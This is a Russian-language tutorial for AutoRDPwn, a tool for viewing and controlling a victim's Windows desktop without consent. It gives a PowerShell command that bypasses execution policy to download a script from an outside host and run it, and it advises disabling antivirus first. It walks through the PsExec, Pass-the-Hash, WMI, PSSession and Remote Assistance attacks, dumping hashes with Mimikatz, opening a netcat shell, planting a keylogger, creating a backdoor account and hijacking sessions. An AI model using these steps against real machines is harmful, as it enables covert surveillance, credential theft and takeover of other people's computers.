AutoRDPwn
AutoRDPwn позволяет удаленному злоумышленнику просматривать рабочий стол своей жертвы без его согласия, и даже контролировать его по требованию, используя инструменты, встроенные в саму операционную систему.
Благодаря дополнительным модулям можно получить удаленную оболочку через Netcat, сбросить системные хэши с помощью Mimikatz, загрузить удаленный кейлоггер и многое другое. Все это, благодаря полностью интуитивно понятному меню на семи разных языках.
Первое, что мы сделаем, это зайдем на страницу проекта на Github по следующей ссылке: https://github.com/JoelGMSec/AutoRDPwn
Далее мы скопируем код выполнения в строку и вставим его в окно выполнения Windows, в командную консоль или Powershell:
powershell -ExecutionPolicy Bypass "cd $env:TEMP ; iwr https://darkbyte.net/autordpwn.php -Outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Возможно, что некоторые антивирусы обнаружат инструмент как угрозу, поэтому я рекомендую отключить его перед выполнением.
Первое, что мы увидим при запуске программы, это главное меню, где мы можем выбрать, как запустить атаку или загрузить дополнительные модули.
В текущей версии доступны следующие атаки:
[1] - PsExec [2 ] - передать хэш [3] - инструментарий управления Windows [4] - запланировать задачу / сеанс PSSession [5] - удаленный помощник Windows
Первый (PsExec) начнет атаку по протоколу SMB . Для его надлежащего функционирования важно, чтобы жертва отвечала следующим требованиям:
• Ресурс ADMIN $ должен быть включен.
• Порт 445 должен быть открыт и прослушивать.
• Пользователь должен иметь права администратора на компьютере.
• Конфигурация сети должна быть внутренней или частной.
Во всех атаках (кроме Pass The Hash) нам всегда нужно будет вводить три поля: ip жертвы, пользователя и его пароль.
Теперь мы продолжим третью атаку (инструментарий управления Windows) , поскольку для второй нам понадобится загрузить дополнительный модуль,который мы увидим позже.
В этом случае единственным изменением от предыдущей атаки является протокол соединения. Для его корректной работы потребуется только включить WMI в жертве и принимать входящие соединения.
Переходим к четвертой атаке (Schedule Task / PSSession). Эта атака имеет два варианта, которые разделяют протокол соединения: Powershell. Для правильной работы нам нужно, чтобы жертва включила WinRM или, если это не удалось, PSRemoting.
Всякий раз, когда на экране появляется вопрос, мы можем ответить без различия между строчными и прописными буквами.
Мы продолжаем с пятым вариантом (Windows Remote Assistance). Чтобы атака работала в этом случае, все, что нам нужно, это то, что удаленные вспомогательные соединения группы включены.
Теперь перейдем к дополнительным модулям , для этого мы нажмем букву Ми перейдем в подменю, где увидим доступные опции:
[1] - Mimikatz [2 ] - Полуинтерактивная консоль [M] - Вернуться в главное меню
В первом модуле мы можем загрузить Mimikatz в нашу команду для восстановления хешей оборудования. Это поможет нам начать атаку Pass The Hash.
Сам инструмент автоматически определит архитектуру нашей системы, чтобы впоследствии выполнить соответствующую версию. Кроме того, он выполнит все необходимые команды для дампа SAM без взаимодействия с пользователем.
Второй загрузит полуинтерактивную консоль , которая появится после успешного завершения атаки.
Теперь вернемся ко второй атаке (Pass the Hash). Для его корректной работы мы должны соответствовать тем же требованиям, что и первое (PsExec), и, кроме того, нам необходимо знать домен и хэш жертвы.
Если мы уже находимся в доменной сети, у нас будут все необходимые данные для запуска атаки.
Поскольку для успешной атаки важно иметь действительные учетные данные, этот метод создаст пользователя AutoRDPwn (с паролем, идентичным имени пользователя) на компьютере жертвы. Таким образом, когда мы дойдем до последнего шага, мы введем эти учетные данные для завершения соединения.
Как дополнительный факт, эта техника также работает в командах в рабочей группе. Для этого нам нужно будет ввести localhost, когда мы попросим домен.
Теперь, когда мы знаем, как работают все доступные опции, посмотрим, что будет дальше. Независимо от используемого вектора атаки, с жертвой будет создано удаленное соединение, которое изменит конфигурацию сети, брандмауэр Windows и разрешит удаленное управление компьютером.
На этом этапе приложение спросит нас, хотим ли мы визуализироватьудаленный компьютер или управлять им.
Этот момент важен, потому что, как только мы решили, мы не можем снова изменить наш выбор. Единственное, что мы можем сделать, это закрыть программу и начать все сначала.
В зависимости от того, что мы выбрали, инструмент изменит необходимые регистры Windows, чтобы все работало правильно. Затем он проверит версию операционной системы и выполнит поиск активных сессий, чтобы иметь возможность их взломать.
Если команда жертвы использует настольную версию, инструмент установит патч, который позволит нам подключаться одновременно, как если бы это был сервер. Эта функциональность необходима для правильной работы атаки.
Напротив, если жертва является версией Windows Server, программа спросит нас напрямую, какой сеанс мы хотим видеть или контролировать.
Если все работает правильно, появится окно, где нам нужно будет записать учетные данные, которые мы использовали ранее, или AutoRDPwn, если мы использовали Pass The Hash. Если мы загрузили консольный модуль, он также появится после окна входа в систему .
Чтобы закончить, я оставляю несколько технических советов, которые будут очень полезны:
• PsExec очень хорошо работает в настольных версиях, поскольку по умолчанию в Windows открыт порт 445 и включен ресурс ADMIN $ (при условии, что сетевая конфигурация является внутренней или частной )
• И WMI, и PSSession включены по умолчанию в версиях Windows Server для пользователя-администратора.
• Для всех версий Windows по умолчанию удаленная помощь включена по умолчанию.
• Pass Атака Hash может быть запущена против себя (с использованием localhost в качестве цели ) на серверах с включенными службами терминалов, чтобы шпионить / контролировать другие сеансы.